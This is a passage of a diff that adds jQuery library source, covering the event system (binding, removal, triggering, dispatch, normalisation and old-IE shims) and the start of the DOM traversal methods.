+	add: function( elem, types, handler, data, selector ) {
+		var tmp, events, t, handleObjIn,
+			special, eventHandle, handleObj,
+			handlers, type, namespaces, origType,
+			elemData = jQuery._data( elem );
+
+		// Don't attach events to noData or text/comment nodes (but allow plain objects)
+		if ( !elemData ) {
+			return;
+		}
+
+		// Caller can pass in an object of custom data in lieu of the handler
+		if ( handler.handler ) {
+			handleObjIn = handler;
+			handler = handleObjIn.handler;
+			selector = handleObjIn.selector;
+		}
+
+		// Make sure that the handler has a unique ID, used to find/remove it later
+		if ( !handler.guid ) {
+			handler.guid = jQuery.guid++;
+		}
+
+		// Init the element's event structure and main handler, if this is the first
+		if ( !(events = elemData.events) ) {
+			events = elemData.events = {};
+		}
+		if ( !(eventHandle = elemData.handle) ) {
+			eventHandle = elemData.handle = function( e ) {
+				// Discard the second event of a jQuery.event.trigger() and
+				// when an event is called after a page has unloaded
+				return typeof jQuery !== core_strundefined && (!e || jQuery.event.triggered !== e.type) ?
+					jQuery.event.dispatch.apply( eventHandle.elem, arguments ) :
+					undefined;
+			};
+			// Add elem as a property of the handle fn to prevent a memory leak with IE non-native events
+			eventHandle.elem = elem;
+		}
+
+		// Handle multiple events separated by a space
+		types = ( types || "" ).match( core_rnotwhite ) || [""];
+		t = types.length;
+		while ( t-- ) {
+			tmp = rtypenamespace.exec( types[t] ) || [];
+			type = origType = tmp[1];
+			namespaces = ( tmp[2] || "" ).split( "." ).sort();
+
+			// There *must* be a type, no attaching namespace-only handlers
+			if ( !type ) {
+				continue;
+			}
+
+			// If event changes its type, use the special event handlers for the changed type
+			special = jQuery.event.special[ type ] || {};
+
+			// If selector defined, determine special event api type, otherwise given type
+			type = ( selector ? special.delegateType : special.bindType ) || type;
+
+			// Update special based on newly reset type
+			special = jQuery.event.special[ type ] || {};
+
+			// handleObj is passed to all event handlers
+			handleObj = jQuery.extend({
+				type: type,
+				origType: origType,
+				data: data,
+				handler: handler,
+				guid: handler.guid,
+				selector: selector,
+				needsContext: selector && jQuery.expr.match.needsContext.test( selector ),
+				namespace: namespaces.join(".")
+			}, handleObjIn );
+
+			// Init the event handler queue if we're the first
+			if ( !(handlers = events[ type ]) ) {
+				handlers = events[ type ] = [];
+				handlers.delegateCount = 0;
+
+				// Only use addEventListener/attachEvent if the special events handler returns false
+				if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false ) {
+					// Bind the global event handler to the element
+					if ( elem.addEventListener ) {
+						elem.addEventListener( type, eventHandle, false );
+
+					} else if ( elem.attachEvent ) {
+						elem.attachEvent( "on" + type, eventHandle );
+					}
+				}
+			}
+
+			if ( special.add ) {
+				special.add.call( elem, handleObj );
+
+				if ( !handleObj.handler.guid ) {
+					handleObj.handler.guid = handler.guid;
+				}
+			}
+
+			// Add to the element's handler list, delegates in front
+			if ( selector ) {
+				handlers.splice( handlers.delegateCount++, 0, handleObj );
+			} else {
+				handlers.push( handleObj );
+			}
+
+			// Keep track of which events have ever been used, for event optimization
+			jQuery.event.global[ type ] = true;
+		}
+
+		// Nullify elem to prevent memory leaks in IE
+		elem = null;
+	},
+
+	// Detach an event or set of events from an element
+	remove: function( elem, types, handler, selector, mappedTypes ) {
+		var j, handleObj, tmp,
+			origCount, t, events,
+			special, handlers, type,
+			namespaces, origType,
+			elemData = jQuery.hasData( elem ) && jQuery._data( elem );
+
+		if ( !elemData || !(events = elemData.events) ) {
+			return;
+		}
+
+		// Once for each type.namespace in types; type may be omitted
+		types = ( types || "" ).match( core_rnotwhite ) || [""];
+		t = types.length;
+		while ( t-- ) {
+			tmp = rtypenamespace.exec( types[t] ) || [];
+			type = origType = tmp[1];
+			namespaces = ( tmp[2] || "" ).split( "." ).sort();
+
+			// Unbind all events (on this namespace, if provided) for the element
+			if ( !type ) {
+				for ( type in events ) {
+					jQuery.event.remove( elem, type + types[ t ], handler, selector, true );
+				}
+				continue;
+			}
+
+			special = jQuery.event.special[ type ] || {};
+			type = ( selector ? special.delegateType : special.bindType ) || type;
+			handlers = events[ type ] || [];
+			tmp = tmp[2] && new RegExp( "(^|\\.)" + namespaces.join("\\.(?:.*\\.|)") + "(\\.|$)" );
+
+			// Remove matching events
+			origCount = j = handlers.length;
+			while ( j-- ) {
+				handleObj = handlers[ j ];
+
+				if ( ( mappedTypes || origType === handleObj.origType ) &&
+					( !handler || handler.guid === handleObj.guid ) &&
+					( !tmp || tmp.test( handleObj.namespace ) ) &&
+					( !selector || selector === handleObj.selector || selector === "**" && handleObj.selector ) ) {
+					handlers.splice( j, 1 );
+
+					if ( handleObj.selector ) {
+						handlers.delegateCount--;
+					}
+					if ( special.remove ) {
+						special.remove.call( elem, handleObj );
+					}
+				}
+			}
+
+			// Remove generic event handler if we removed something and no more handlers exist
+			// (avoids potential for endless recursion during removal of special event handlers)
+			if ( origCount && !handlers.length ) {
+				if ( !special.teardown || special.teardown.call( elem, namespaces, elemData.handle ) === false ) {
+					jQuery.removeEvent( elem, type, elemData.handle );
+				}
+
+				delete events[ type ];
+			}
+		}
+
+		// Remove the expando if it's no longer used
+		if ( jQuery.isEmptyObject( events ) ) {
+			delete elemData.handle;
+
+			// removeData also checks for emptiness and clears the expando if empty
+			// so use it instead of delete
+			jQuery._removeData( elem, "events" );
+		}
+	},
+
+	trigger: function( event, data, elem, onlyHandlers ) {
+		var handle, ontype, cur,
+			bubbleType, special, tmp, i,
+			eventPath = [ elem || document ],
+			type = core_hasOwn.call( event, "type" ) ? event.type : event,
+			namespaces = core_hasOwn.call( event, "namespace" ) ? event.namespace.split(".") : [];
+
+		cur = tmp = elem = elem || document;
+
+		// Don't do events on text and comment nodes
+		if ( elem.nodeType === 3 || elem.nodeType === 8 ) {
+			return;
+		}
+
+		// focus/blur morphs to focusin/out; ensure we're not firing them right now
+		if ( rfocusMorph.test( type + jQuery.event.triggered ) ) {
+			return;
+		}
+
+		if ( type.indexOf(".") >= 0 ) {
+			// Namespaced trigger; create a regexp to match event type in handle()
+			namespaces = type.split(".");
+			type = namespaces.shift();
+			namespaces.sort();
+		}
+		ontype = type.indexOf(":") < 0 && "on" + type;
+
+		// Caller can pass in a jQuery.Event object, Object, or just an event type string
+		event = event[ jQuery.expando ] ?
+			event :
+			new jQuery.Event( type, typeof event === "object" && event );
+
+		// Trigger bitmask: & 1 for native handlers; & 2 for jQuery (always true)
+		event.isTrigger = onlyHandlers ? 2 : 3;
+		event.namespace = namespaces.join(".");
+		event.namespace_re = event.namespace ?
+			new RegExp( "(^|\\.)" + namespaces.join("\\.(?:.*\\.|)") + "(\\.|$)" ) :
+			null;
+
+		// Clean up the event in case it is being reused
+		event.result = undefined;
+		if ( !event.target ) {
+			event.target = elem;
+		}
+
+		// Clone any incoming data and prepend the event, creating the handler arg list
+		data = data == null ?
+			[ event ] :
+			jQuery.makeArray( data, [ event ] );
+
+		// Allow special events to draw outside the lines
+		special = jQuery.event.special[ type ] || {};
+		if ( !onlyHandlers && special.trigger && special.trigger.apply( elem, data ) === false ) {
+			return;
+		}
+
+		// Determine event propagation path in advance, per W3C events spec (#9951)
+		// Bubble up to document, then to window; watch for a global ownerDocument var (#9724)
+		if ( !onlyHandlers && !special.noBubble && !jQuery.isWindow( elem ) ) {
+
+			bubbleType = special.delegateType || type;
+			if ( !rfocusMorph.test( bubbleType + type ) ) {
+				cur = cur.parentNode;
+			}
+			for ( ; cur; cur = cur.parentNode ) {
+				eventPath.push( cur );
+				tmp = cur;
+			}
+
+			// Only add window if we got to document (e.g., not plain obj or detached DOM)
+			if ( tmp === (elem.ownerDocument || document) ) {
+				eventPath.push( tmp.defaultView || tmp.parentWindow || window );
+			}
+		}
+
+		// Fire handlers on the event path
+		i = 0;
+		while ( (cur = eventPath[i++]) && !event.isPropagationStopped() ) {
+
+			event.type = i > 1 ?
+				bubbleType :
+				special.bindType || type;
+
+			// jQuery handler
+			handle = ( jQuery._data( cur, "events" ) || {} )[ event.type ] && jQuery._data( cur, "handle" );
+			if ( handle ) {
+				handle.apply( cur, data );
+			}
+
+			// Native handler
+			handle = ontype && cur[ ontype ];
+			if ( handle && jQuery.acceptData( cur ) && handle.apply && handle.apply( cur, data ) === false ) {
+				event.preventDefault();
+			}
+		}
+		event.type = type;
+
+		// If nobody prevented the default action, do it now
+		if ( !onlyHandlers && !event.isDefaultPrevented() ) {
+
+			if ( (!special._default || special._default.apply( eventPath.pop(), data ) === false) &&
+				jQuery.acceptData( elem ) ) {
+
+				// Call a native DOM method on the target with the same name name as the event.
+				// Can't use an .isFunction() check here because IE6/7 fails that test.
+				// Don't do default actions on window, that's where global variables be (#6170)
+				if ( ontype && elem[ type ] && !jQuery.isWindow( elem ) ) {
+
+					// Don't re-trigger an onFOO event when we call its FOO() method
+					tmp = elem[ ontype ];
+
+					if ( tmp ) {
+						elem[ ontype ] = null;
+					}
+
+					// Prevent re-triggering of the same event, since we already bubbled it above
+					jQuery.event.triggered = type;
+					try {
+						elem[ type ]();
+					} catch ( e ) {
+						// IE<9 dies on focus/blur to hidden element (#1486,#12518)
+						// only reproducible on winXP IE8 native, not IE9 in IE8 mode
+					}
+					jQuery.event.triggered = undefined;
+
+					if ( tmp ) {
+						elem[ ontype ] = tmp;
+					}
+				}
+			}
+		}
+
+		return event.result;
+	},
+
+	dispatch: function( event ) {
+
+		// Make a writable jQuery.Event from the native event object
+		event = jQuery.event.fix( event );
+
+		var i, ret, handleObj, matched, j,
+			handlerQueue = [],
+			args = core_slice.call( arguments ),
+			handlers = ( jQuery._data( this, "events" ) || {} )[ event.type ] || [],
+			special = jQuery.event.special[ event.type ] || {};
+
+		// Use the fix-ed jQuery.Event rather than the (read-only) native event
+		args[0] = event;
+		event.delegateTarget = this;
+
+		// Call the preDispatch hook for the mapped type, and let it bail if desired
+		if ( special.preDispatch && special.preDispatch.call( this, event ) === false ) {
+			return;
+		}
+
+		// Determine handlers
+		handlerQueue = jQuery.event.handlers.call( this, event, handlers );
+
+		// Run delegates first; they may want to stop propagation beneath us
+		i = 0;
+		while ( (matched = handlerQueue[ i++ ]) && !event.isPropagationStopped() ) {
+			event.currentTarget = matched.elem;
+
+			j = 0;
+			while ( (handleObj = matched.handlers[ j++ ]) && !event.isImmediatePropagationStopped() ) {
+
+				// Triggered event must either 1) have no namespace, or
+				// 2) have namespace(s) a subset or equal to those in the bound event (both can have no namespace).
+				if ( !event.namespace_re || event.namespace_re.test( handleObj.namespace ) ) {
+
+					event.handleObj = handleObj;
+					event.data = handleObj.data;
+
+					ret = ( (jQuery.event.special[ handleObj.origType ] || {}).handle || handleObj.handler )
+							.apply( matched.elem, args );
+
+					if ( ret !== undefined ) {
+						if ( (event.result = ret) === false ) {
+							event.preventDefault();
+							event.stopPropagation();
+						}
+					}
+				}
+			}
+		}
+
+		// Call the postDispatch hook for the mapped type
+		if ( special.postDispatch ) {
+			special.postDispatch.call( this, event );
+		}
+
+		return event.result;
+	},
+
+	handlers: function( event, handlers ) {
+		var sel, handleObj, matches, i,
+			handlerQueue = [],
+			delegateCount = handlers.delegateCount,
+			cur = event.target;
+
+		// Find delegate handlers
+		// Black-hole SVG <use> instance trees (#13180)
+		// Avoid non-left-click bubbling in Firefox (#3861)
+		if ( delegateCount && cur.nodeType && (!event.button || event.type !== "click") ) {
+
+			/* jshint eqeqeq: false */
+			for ( ; cur != this; cur = cur.parentNode || this ) {
+				/* jshint eqeqeq: true */
+
+				// Don't check non-elements (#13208)
+				// Don't process clicks on disabled elements (#6911, #8165, #11382, #11764)
+				if ( cur.nodeType === 1 && (cur.disabled !== true || event.type !== "click") ) {
+					matches = [];
+					for ( i = 0; i < delegateCount; i++ ) {
+						handleObj = handlers[ i ];
+
+						// Don't conflict with Object.prototype properties (#13203)
+						sel = handleObj.selector + " ";
+
+						if ( matches[ sel ] === undefined ) {
+							matches[ sel ] = handleObj.needsContext ?
+								jQuery( sel, this ).index( cur ) >= 0 :
+								jQuery.find( sel, this, null, [ cur ] ).length;
+						}
+						if ( matches[ sel ] ) {
+							matches.push( handleObj );
+						}
+					}
+					if ( matches.length ) {
+						handlerQueue.push({ elem: cur, handlers: matches });
+					}
+				}
+			}
+		}
+
+		// Add the remaining (directly-bound) handlers
+		if ( delegateCount < handlers.length ) {
+			handlerQueue.push({ elem: this, handlers: handlers.slice( delegateCount ) });
+		}
+
+		return handlerQueue;
+	},
+
+	fix: function( event ) {
+		if ( event[ jQuery.expando ] ) {
+			return event;
+		}
+
+		// Create a writable copy of the event object and normalize some properties
+		var i, prop, copy,
+			type = event.type,
+			originalEvent = event,
+			fixHook = this.fixHooks[ type ];
+
+		if ( !fixHook ) {
+			this.fixHooks[ type ] = fixHook =
+				rmouseEvent.test( type ) ? this.mouseHooks :
+				rkeyEvent.test( type ) ? this.keyHooks :
+				{};
+		}
+		copy = fixHook.props ? this.props.concat( fixHook.props ) : this.props;
+
+		event = new jQuery.Event( originalEvent );
+
+		i = copy.length;
+		while ( i-- ) {
+			prop = copy[ i ];
+			event[ prop ] = originalEvent[ prop ];
+		}
+
+		// Support: IE<9
+		// Fix target property (#1925)
+		if ( !event.target ) {
+			event.target = originalEvent.srcElement || document;
+		}
+
+		// Support: Chrome 23+, Safari?
+		// Target should not be a text node (#504, #13143)
+		if ( event.target.nodeType === 3 ) {
+			event.target = event.target.parentNode;
+		}
+
+		// Support: IE<9
+		// For mouse/key events, metaKey==false if it's undefined (#3368, #11328)
+		event.metaKey = !!event.metaKey;
+
+		return fixHook.filter ? fixHook.filter( event, originalEvent ) : event;
+	},
+
+	// Includes some event props shared by KeyEvent and MouseEvent
+	props: "altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),
+
+	fixHooks: {},
+
+	keyHooks: {
+		props: "char charCode key keyCode".split(" "),
+		filter: function( event, original ) {
+
+			// Add which for key events
+			if ( event.which == null ) {
+				event.which = original.charCode != null ? original.charCode : original.keyCode;
+			}
+
+			return event;
+		}
+	},
+
+	mouseHooks: {
+		props: "button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),
+		filter: function( event, original ) {
+			var body, eventDoc, doc,
+				button = original.button,
+				fromElement = original.fromElement;
+
+			// Calculate pageX/Y if missing and clientX/Y available
+			if ( event.pageX == null && original.clientX != null ) {
+				eventDoc = event.target.ownerDocument || document;
+				doc = eventDoc.documentElement;
+				body = eventDoc.body;
+
+				event.pageX = original.clientX + ( doc && doc.scrollLeft || body && body.scrollLeft || 0 ) - ( doc && doc.clientLeft || body && body.clientLeft || 0 );
+				event.pageY = original.clientY + ( doc && doc.scrollTop  || body && body.scrollTop  || 0 ) - ( doc && doc.clientTop  || body && body.clientTop  || 0 );
+			}
+
+			// Add relatedTarget, if necessary
+			if ( !event.relatedTarget && fromElement ) {
+				event.relatedTarget = fromElement === event.target ? original.toElement : fromElement;
+			}
+
+			// Add which for click: 1 === left; 2 === middle; 3 === right
+			// Note: button is not normalized, so don't use it
+			if ( !event.which && button !== undefined ) {
+				event.which = ( button & 1 ? 1 : ( button & 2 ? 3 : ( button & 4 ? 2 : 0 ) ) );
+			}
+
+			return event;
+		}
+	},
+
+	special: {
+		load: {
+			// Prevent triggered image.load events from bubbling to window.load
+			noBubble: true
+		},
+		focus: {
+			// Fire native event if possible so blur/focus sequence is correct
+			trigger: function() {
+				if ( this !== safeActiveElement() && this.focus ) {
+					try {
+						this.focus();
+						return false;
+					} catch ( e ) {
+						// Support: IE<9
+						// If we error on focus to hidden element (#1486, #12518),
+						// let .trigger() run the handlers
+					}
+				}
+			},
+			delegateType: "focusin"
+		},
+		blur: {
+			trigger: function() {
+				if ( this === safeActiveElement() && this.blur ) {
+					this.blur();
+					return false;
+				}
+			},
+			delegateType: "focusout"
+		},
+		click: {
+			// For checkbox, fire native event so checked state will be right
+			trigger: function() {
+				if ( jQuery.nodeName( this, "input" ) && this.type === "checkbox" && this.click ) {
+					this.click();
+					return false;
+				}
+			},
+
+			// For cross-browser consistency, don't fire native .click() on links
+			_default: function( event ) {
+				return jQuery.nodeName( event.target, "a" );
+			}
+		},
+
+		beforeunload: {
+			postDispatch: function( event ) {
+
+				// Even when returnValue equals to undefined Firefox will still show alert
+				if ( event.result !== undefined ) {
+					event.originalEvent.returnValue = event.result;
+				}
+			}
+		}
+	},
+
+	simulate: function( type, elem, event, bubble ) {
+		// Piggyback on a donor event to simulate a different one.
+		// Fake originalEvent to avoid donor's stopPropagation, but if the
+		// simulated event prevents default then we do the same on the donor.
+		var e = jQuery.extend(
+			new jQuery.Event(),
+			event,
+			{
+				type: type,
+				isSimulated: true,
+				originalEvent: {}
+			}
+		);
+		if ( bubble ) {
+			jQuery.event.trigger( e, null, elem );
+		} else {
+			jQuery.event.dispatch.call( elem, e );
+		}
+		if ( e.isDefaultPrevented() ) {
+			event.preventDefault();
+		}
+	}
+};
+
+jQuery.removeEvent = document.removeEventListener ?
+	function( elem, type, handle ) {
+		if ( elem.removeEventListener ) {
+			elem.removeEventListener( type, handle, false );
+		}
+	} :
+	function( elem, type, handle ) {
+		var name = "on" + type;
+
+		if ( elem.detachEvent ) {
+
+			// #8545, #7054, preventing memory leaks for custom events in IE6-8
+			// detachEvent needed property on element, by name of that event, to properly expose it to GC
+			if ( typeof elem[ name ] === core_strundefined ) {
+				elem[ name ] = null;
+			}
+
+			elem.detachEvent( name, handle );
+		}
+	};
+
+jQuery.Event = function( src, props ) {
+	// Allow instantiation without the 'new' keyword
+	if ( !(this instanceof jQuery.Event) ) {
+		return new jQuery.Event( src, props );
+	}
+
+	// Event object
+	if ( src && src.type ) {
+		this.originalEvent = src;
+		this.type = src.type;
+
+		// Events bubbling up the document may have been marked as prevented
+		// by a handler lower down the tree; reflect the correct value.
+		this.isDefaultPrevented = ( src.defaultPrevented || src.returnValue === false ||
+			src.getPreventDefault && src.getPreventDefault() ) ? returnTrue : returnFalse;
+
+	// Event type
+	} else {
+		this.type = src;
+	}
+
+	// Put explicitly provided properties onto the event object
+	if ( props ) {
+		jQuery.extend( this, props );
+	}
+
+	// Create a timestamp if incoming event doesn't have one
+	this.timeStamp = src && src.timeStamp || jQuery.now();
+
+	// Mark it as fixed
+	this[ jQuery.expando ] = true;
+};
+
+// jQuery.Event is based on DOM3 Events as specified by the ECMAScript Language Binding
+// http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html
+jQuery.Event.prototype = {
+	isDefaultPrevented: returnFalse,
+	isPropagationStopped: returnFalse,
+	isImmediatePropagationStopped: returnFalse,
+
+	preventDefault: function() {
+		var e = this.originalEvent;
+
+		this.isDefaultPrevented = returnTrue;
+		if ( !e ) {
+			return;
+		}
+
+		// If preventDefault exists, run it on the original event
+		if ( e.preventDefault ) {
+			e.preventDefault();
+
+		// Support: IE
+		// Otherwise set the returnValue property of the original event to false
+		} else {
+			e.returnValue = false;
+		}
+	},
+	stopPropagation: function() {
+		var e = this.originalEvent;
+
+		this.isPropagationStopped = returnTrue;
+		if ( !e ) {
+			return;
+		}
+		// If stopPropagation exists, run it on the original event
+		if ( e.stopPropagation ) {
+			e.stopPropagation();
+		}
+
+		// Support: IE
+		// Set the cancelBubble property of the original event to true
+		e.cancelBubble = true;
+	},
+	stopImmediatePropagation: function() {
+		this.isImmediatePropagationStopped = returnTrue;
+		this.stopPropagation();
+	}
+};
+
+// Create mouseenter/leave events using mouseover/out and event-time checks
+jQuery.each({
+	mouseenter: "mouseover",
+	mouseleave: "mouseout"
+}, function( orig, fix ) {
+	jQuery.event.special[ orig ] = {
+		delegateType: fix,
+		bindType: fix,
+
+		handle: function( event ) {
+			var ret,
+				target = this,
+				related = event.relatedTarget,
+				handleObj = event.handleObj;
+
+			// For mousenter/leave call the handler if related is outside the target.
+			// NB: No relatedTarget if the mouse left/entered the browser window
+			if ( !related || (related !== target && !jQuery.contains( target, related )) ) {
+				event.type = handleObj.origType;
+				ret = handleObj.handler.apply( this, arguments );
+				event.type = fix;
+			}
+			return ret;
+		}
+	};
+});
+
+// IE submit delegation
+if ( !jQuery.support.submitBubbles ) {
+
+	jQuery.event.special.submit = {
+		setup: function() {
+			// Only need this for delegated form submit events
+			if ( jQuery.nodeName( this, "form" ) ) {
+				return false;
+			}
+
+			// Lazy-add a submit handler when a descendant form may potentially be submitted
+			jQuery.event.add( this, "click._submit keypress._submit", function( e ) {
+				// Node name check avoids a VML-related crash in IE (#9807)
+				var elem = e.target,
+					form = jQuery.nodeName( elem, "input" ) || jQuery.nodeName( elem, "button" ) ? elem.form : undefined;
+				if ( form && !jQuery._data( form, "submitBubbles" ) ) {
+					jQuery.event.add( form, "submit._submit", function( event ) {
+						event._submit_bubble = true;
+					});
+					jQuery._data( form, "submitBubbles", true );
+				}
+			});
+			// return undefined since we don't need an event listener
+		},
+
+		postDispatch: function( event ) {
+			// If form was submitted by the user, bubble the event up the tree
+			if ( event._submit_bubble ) {
+				delete event._submit_bubble;
+				if ( this.parentNode && !event.isTrigger ) {
+					jQuery.event.simulate( "submit", this.parentNode, event, true );
+				}
+			}
+		},
+
+		teardown: function() {
+			// Only need this for delegated form submit events
+			if ( jQuery.nodeName( this, "form" ) ) {
+				return false;
+			}
+
+			// Remove delegated handlers; cleanData eventually reaps submit handlers attached above
+			jQuery.event.remove( this, "._submit" );
+		}
+	};
+}
+
+// IE change delegation and checkbox/radio fix
+if ( !jQuery.support.changeBubbles ) {
+
+	jQuery.event.special.change = {
+
+		setup: function() {
+
+			if ( rformElems.test( this.nodeName ) ) {
+				// IE doesn't fire change on a check/radio until blur; trigger it on click
+				// after a propertychange. Eat the blur-change in special.change.handle.
+				// This still fires onchange a second time for check/radio after blur.
+				if ( this.type === "checkbox" || this.type === "radio" ) {
+					jQuery.event.add( this, "propertychange._change", function( event ) {
+						if ( event.originalEvent.propertyName === "checked" ) {
+							this._just_changed = true;
+						}
+					});
+					jQuery.event.add( this, "click._change", function( event ) {
+						if ( this._just_changed && !event.isTrigger ) {
+							this._just_changed = false;
+						}
+						// Allow triggered, simulated change events (#11500)
+						jQuery.event.simulate( "change", this, event, true );
+					});
+				}
+				return false;
+			}
+			// Delegated event; lazy-add a change handler on descendant inputs
+			jQuery.event.add( this, "beforeactivate._change", function( e ) {
+				var elem = e.target;
+
+				if ( rformElems.test( elem.nodeName ) && !jQuery._data( elem, "changeBubbles" ) ) {
+					jQuery.event.add( elem, "change._change", function( event ) {
+						if ( this.parentNode && !event.isSimulated && !event.isTrigger ) {
+							jQuery.event.simulate( "change", this.parentNode, event, true );
+						}
+					});
+					jQuery._data( elem, "changeBubbles", true );
+				}
+			});
+		},
+
+		handle: function( event ) {
+			var elem = event.target;
+
+			// Swallow native change events from checkbox/radio, we already triggered them above
+			if ( this !== elem || event.isSimulated || event.isTrigger || (elem.type !== "radio" && elem.type !== "checkbox") ) {
+				return event.handleObj.handler.apply( this, arguments );
+			}
+		},
+
+		teardown: function() {
+			jQuery.event.remove( this, "._change" );
+
+			return !rformElems.test( this.nodeName );
+		}
+	};
+}
+
+// Create "bubbling" focus and blur events
+if ( !jQuery.support.focusinBubbles ) {
+	jQuery.each({ focus: "focusin", blur: "focusout" }, function( orig, fix ) {
+
+		// Attach a single capturing handler while someone wants focusin/focusout
+		var attaches = 0,
+			handler = function( event ) {
+				jQuery.event.simulate( fix, event.target, jQuery.event.fix( event ), true );
+			};
+
+		jQuery.event.special[ fix ] = {
+			setup: function() {
+				if ( attaches++ === 0 ) {
+					document.addEventListener( orig, handler, true );
+				}
+			},
+			teardown: function() {
+				if ( --attaches === 0 ) {
+					document.removeEventListener( orig, handler, true );
+				}
+			}
+		};
+	});
+}
+
+jQuery.fn.extend({
+
+	on: function( types, selector, data, fn, /*INTERNAL*/ one ) {
+		var type, origFn;
+
+		// Types can be a map of types/handlers
+		if ( typeof types === "object" ) {
+			// ( types-Object, selector, data )
+			if ( typeof selector !== "string" ) {
+				// ( types-Object, data )
+				data = data || selector;
+				selector = undefined;
+			}
+			for ( type in types ) {
+				this.on( type, selector, data, types[ type ], one );
+			}
+			return this;
+		}
+
+		if ( data == null && fn == null ) {
+			// ( types, fn )
+			fn = selector;
+			data = selector = undefined;
+		} else if ( fn == null ) {
+			if ( typeof selector === "string" ) {
+				// ( types, selector, fn )
+				fn = data;
+				data = undefined;
+			} else {
+				// ( types, data, fn )
+				fn = data;
+				data = selector;
+				selector = undefined;
+			}
+		}
+		if ( fn === false ) {
+			fn = returnFalse;
+		} else if ( !fn ) {
+			return this;
+		}
+
+		if ( one === 1 ) {
+			origFn = fn;
+			fn = function( event ) {
+				// Can use an empty set, since event contains the info
+				jQuery().off( event );
+				return origFn.apply( this, arguments );
+			};
+			// Use same guid so caller can remove using origFn
+			fn.guid = origFn.guid || ( origFn.guid = jQuery.guid++ );
+		}
+		return this.each( function() {
+			jQuery.event.add( this, types, fn, data, selector );
+		});
+	},
+	one: function( types, selector, data, fn ) {
+		return this.on( types, selector, data, fn, 1 );
+	},
+	off: function( types, selector, fn ) {
+		var handleObj, type;
+		if ( types && types.preventDefault && types.handleObj ) {
+			// ( event )  dispatched jQuery.Event
+			handleObj = types.handleObj;
+			jQuery( types.delegateTarget ).off(
+				handleObj.namespace ? handleObj.origType + "." + handleObj.namespace : handleObj.origType,
+				handleObj.selector,
+				handleObj.handler
+			);
+			return this;
+		}
+		if ( typeof types === "object" ) {
+			// ( types-object [, selector] )
+			for ( type in types ) {
+				this.off( type, selector, types[ type ] );
+			}
+			return this;
+		}
+		if ( selector === false || typeof selector === "function" ) {
+			// ( types [, fn] )
+			fn = selector;
+			selector = undefined;
+		}
+		if ( fn === false ) {
+			fn = returnFalse;
+		}
+		return this.each(function() {
+			jQuery.event.remove( this, types, fn, selector );
+		});
+	},
+
+	trigger: function( type, data ) {
+		return this.each(function() {
+			jQuery.event.trigger( type, data, this );
+		});
+	},
+	triggerHandler: function( type, data ) {
+		var elem = this[0];
+		if ( elem ) {
+			return jQuery.event.trigger( type, data, elem, true );
+		}
+	}
+});
+var isSimple = /^.[^:#\[\.,]*$/,
+	rparentsprev = /^(?:parents|prev(?:Until|All))/,
+	rneedsContext = jQuery.expr.match.needsContext,
+	// methods guaranteed to produce a unique set when starting from a unique set
+	guaranteedUnique = {
+		children: true,
+		contents: true,
+		next: true,
+		prev: true
+	};
+
+jQuery.fn.extend({
+	find: function( selector ) {
+		var i,
+			ret = [],
+			self = this,
+			len = self.length;
+
+		if ( typeof selector !== "string" ) {
+			return this.pushStack( jQuery( selector ).filter(function() {
+				for ( i = 0; i < len; i++ ) {
+					if ( jQuery.contains( self[ i ], this ) ) {
+						return true;
+					}
+				}
+			}) );
+		}
+
+		for ( i = 0; i < len; i++ ) {
+			jQuery.find( selector, self[ i ], ret );
+		}
+
+		// Needed because $( selector, context ) becomes $( context ).find( selector )
+		ret = this.pushStack( len > 1 ? jQuery.unique( ret ) : ret );
+		ret.selector = this.selector ? this.selector + " " + selector : selector;
+		return ret;
+	},
+
+	has: function( target ) {
+		var i,
+			targets = jQuery( target, this ),
+			len = targets.length;
+
+		return this.filter(function() {
+			for ( i = 0; i < len; i++ ) {
+				if ( jQuery.contains( this, targets[i] ) ) {
+					return true;
+				}
+			}
+		});
+	},
+
+	not: function( selector ) {
+		return this.pushStack( winnow(this, selector || [], true) );
+	},
+
+	filter: function( selector ) {
+		return this.pushStack( winnow(this, selector || [], false) );
+	},
+
+	is: function( selector ) {
+		return !!winnow(
+			this,
+
+			// If this is a positional/relative selector, check membership in the returned set
+			// so $("p:first").is("p:last") won't return true for a doc with two "p".
+			typeof selector === "string" && rneedsContext.test( selector ) ?
+				jQuery( selector ) :
+				selector || [],
+			false
+		).length;
+	},
+
+	closest: function( selectors, context ) {
+		var cur,
+			i = 0,
+			l = this.length,
+			ret = [],
+			pos = rneedsContext.test( selectors ) || typeof selectors !== "string" ?
+				jQuery( selectors, context || this.context ) :
+				0;
+
+		for ( ; i < l; i++ ) {
+			for ( cur = this[i]; cur && cur !== context; cur = cur.parentNode ) {
+				// Always skip document fragments
+				if ( cur.nodeType < 11 && (pos ?
+					pos.index(cur) > -1 :
+
+					// Don't pass non-elements to Sizzle
+					cur.nodeType === 1 &&
+						jQuery.find.matchesSelector(cur, selectors)) ) {
+
+					cur = ret.push( cur );
+					break;
+				}
+			}
+		}
+
+		return this.pushStack( ret.length > 1 ? jQuery.unique( ret ) : ret );
+	},
+
+	// Determine the position of an element within
+	// the matched set of elements
+	index: function( elem ) {
+
+		// No argument, return index in parent
+		if ( !elem ) {
+			return ( this[0] && this[0].parentNode ) ? this.first().prevAll().length : -1;
+		}
+
+		// index in selector
+		if ( typeof elem === "string" ) {
+			return jQuery.inArray( this[0], jQuery( elem ) );
+		}
+
+		// Locate the position of the desired element
+		return jQuery.inArray(
+			// If it receives a jQuery object, the first element is used
+			elem.jquery ? elem[0] : elem, this );
+	},
+
+	add: function( selector, context ) {
+		var set = typeof selector === "string" ?
+				jQuery( selector, context ) :
+				jQuery.makeArray( selector && selector.nodeType ? [ selector ] : selector ),
+			all = jQuery.merge( this.get(), set );
+
+		return this.pushStack( jQuery.unique(all) );
+	},
+
+	addBack: function( selector ) {
+		return this.add( selector == null ?
+			this.prevObject : this.prevObject.filter(selector)
+		);
+	}
+});
+
+function sibling( cur, dir ) {
+	do {
+		cur = cur[ dir ];
+	} while ( cur && cur.nodeType !== 1 );
+
+	return cur;
+}
+
+jQuery.each({
+	parent: function( elem ) {
+		var parent = elem.parentNode;
+		return parent && parent.nodeType !== 11 ? parent : null;
+	},
+	parents: function( elem ) {
+		return jQuery.dir( elem, "parentNode" );
+	},
+	parentsUntil: function( elem, i, until ) {
+		return jQuery.dir( elem, "parentNode", until );
+	},
+	next: function( elem ) {
+		return sibling( elem, "nextSibling" );
+	},
+	prev: function( elem ) {
